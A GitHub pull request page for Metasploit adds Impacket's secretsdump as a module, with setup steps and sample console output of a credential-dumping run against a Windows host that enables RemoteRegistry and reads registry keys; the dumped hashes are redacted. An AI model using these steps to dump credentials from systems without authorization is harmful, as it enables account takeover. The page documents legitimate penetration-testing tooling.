New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add the scanner/smb/impacket/secretsdump module #10107

Merged
merged 2 commits into from Jul 6, 2018

Conversation

Projects
None yet
3 participants
@zeroSteiner
Copy link
Contributor

zeroSteiner commented May 27, 2018

This adds Impacket's secretsdump as an external module. The basic options were kept and carried over to the module version. The different settings are noted in the markdown documentation. This information was carried over from the original tool.

This uses the same _msf_impacket.py library introduced for the dcomexec module added in PR #9816.

Verification

List the steps needed to make sure this thing works

  • Install Impacket v0.9.17 from GitHub. The impacket package must be
    in Python's module path, so import impacket works from any directory.
  • Install pycrypto v2.7 (the experimental release). Impacket requires
    this specific version.
  • Start msfconsole
  • Do: use auxiliary/scanner/smb/impacket/secretsdump
  • Set: RHOSTS, SMBUser, SMBPass
  • Do: run, see credential data
  • Do: info -d, see the module documentation and ensure it makes sense

Example Output

metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options 

Module options (auxiliary/scanner/smb/impacket/secretsdump):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   ExecMethod  smbexec          yes       The method to use for execution (Accepted: smbexec, wmiexec, mmcexec)
   OutputFile                   no        Write the results to a file
   RHOSTS      192.168.90.11    yes       The target address range or CIDR identifier
   SMBDomain   .                no        The Windows domain to use for authentication
   SMBPass     wakawaka         yes       The password for the specified username
   SMBUser     spencer          yes       The username to authenticate as
   THREADS     1                yes       The number of concurrent threads

metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > run

[*] [2018.04.04-17:15:45] Running for 192.168.90.11...
[*] [2018.04.04-17:15:45] 192.168.90.11 - Service RemoteRegistry is in stopped state
[*] [2018.04.04-17:15:45] 192.168.90.11 - Service RemoteRegistry is disabled, enabling it
[*] [2018.04.04-17:15:45] 192.168.90.11 - Starting service RemoteRegistry
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for JD
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for Skew1
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for GBG
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for Data
[REDACTED]
[*] [2018.04.04-17:15:48] 192.168.90.11 - Cleaning up... 
[*] [2018.04.04-17:15:48] 192.168.90.11 - Stopping service RemoteRegistry
[*] [2018.04.04-17:15:48] 192.168.90.11 - Restoring the disabled state for service RemoteRegistry
[*] [2018.04.04-17:15:48] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jrobles-r7 jrobles-r7 merged commit 7ac8af0 into rapid7:master Jul 6, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Jul 6, 2018

msjenkins-r7 added a commit that referenced this pull request Jul 6, 2018

@tdoan-r7

This comment has been minimized.

Copy link
Contributor

tdoan-r7 commented Jul 17, 2018

Release Notes

The scanner/smb/impacket/secretsdump module has been added to the framework as an external module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment